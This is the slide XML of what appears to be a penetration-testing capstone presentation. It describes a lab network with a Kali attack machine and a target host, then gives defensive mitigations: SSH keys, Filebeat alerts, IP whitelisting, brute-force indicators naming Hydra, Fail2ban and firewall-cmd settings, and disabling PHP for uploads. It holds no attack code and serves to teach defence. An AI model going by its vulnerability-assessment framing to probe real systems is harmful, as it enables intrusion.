          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4489103" y="1299902"/>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Ways to restrict/report access on a specified directory:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Employ alternate forms of login besides user and password. Ex., Secure Shell (SSH) which enables key pairing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider encrypting data in sensitive directories.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Configure logging alerts when certain directories are accessed. Ex., using Filebeat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use a Whitelist so that only desired IP addresses can access the directory.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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300" y="2408664"/>
            <a:ext cx="1234594" cy="85492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dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>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dirty="0"/>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dirty="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dirty="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dirty="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dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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dirty="0"/>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24" name="Google Shape;1224;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1572714"/>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dirty="0" smtClean="0"/>
              <a:t>There are several indicators that a brute force attack may be in progress. These include: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Excessive HTTP 401 Unauthorized Codes</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- Abnormal amount of connections over time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- Large number of errors vs successful </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> transactions on the system</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>known malicious agent (such as Hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>     appears in error logging.                                                        </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   </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25" name="Google Shape;1225;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4503970" y="1587582"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One of the best ways to prevent brute forcing is to set a failed login limit on the host system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example, an account lockout after three failed attempts can stall access for a specified time period, to prevent an external agent from trying to process a password list.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Conversely, some anti-brute force utilities exist in Linux, such as Fail2ban. Example syntax:&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sudo nano /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>etc/fail2ban/jail.local&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Editing the configuration file can set variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    such as IP address to ignore, or length of time    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    to ban that address.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798" y="3936271"/>
            <a:ext cx="1471919" cy="92618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dirty="0"/>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Alerts can be configured for the future; namely, when any unauthorized machines attempt to access WebDAV – i.e., any IP addresses not on the whitelist.</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66800" y="1619568"/>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600" dirty="0" smtClean="0"/>
              <a:t>Since WebDAV is accessible on the internal network for authorized developers, access from the web interface could be disabled.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>If you wanted to whitelist an IP to have access to Capstone, such as ELK, one could use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>following syntax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo firewall-cmd --permanent --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add-source= 192.168.1.100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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69" y="2688217"/>
            <a:ext cx="3185533" cy="196270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dirty="0"/>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Alerts that can detect malicious uploads are as follows:</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>- Flagging activity on destination ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  potentially used by attackers.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>- Check for files of a certain type that may</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  contain executables (ex., .PHP, etc.)</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619568"/>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File uploads can be regulated by the following measures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Guard against transfers without further authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Restrict uptake of any file containing executable code with an appropriate filter.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>One example is to disable PHP entirely in Apache Linux (web server .htaccess). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Ex., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php_flag engine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>[stackoverflow.com]</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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640" y="3137208"/>
            <a:ext cx="1953460" cy="136788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95029" y="2906751"/>
            <a:ext cx="1550883" cy="187802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dirty="0"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Netmask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Gateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: Linux</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r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: Linux</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ELK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r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: Linux</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r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: 10.0.0.8</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: Windows 10 Pro</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ML-RefVm-684427</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dirty="0"/>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55" y="1139262"/>
            <a:ext cx="6508755" cy="317182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dirty="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dirty="0"/>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dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">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dirty="0"/>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dirty="0">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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1076" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3635007224"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="8346600" cy="3577125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{97079959-D9A6-49A7-BC02-231100A66CFA}</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t>ML-RefVm-684427</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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10.0.0.8</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Remote Desktop Host</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b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Capstone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192.168.1.105</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Target Machine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b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK</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192.168.1.100</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Kibana</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Reports (Blue - Defensive)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b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Kali</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192.168.1.90</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Attack Machine (Red - Offensive)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59472"/>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000" dirty="0"/>
              <a:t>Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12300" y="3428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dirty="0">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3325057636"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="390750" y="685348"/>
          <a:ext cx="8362500" cy="4175610"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{97079959-D9A6-49A7-BC02-231100A66CFA}</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60235">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Description</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Impact</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831346">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial"/>
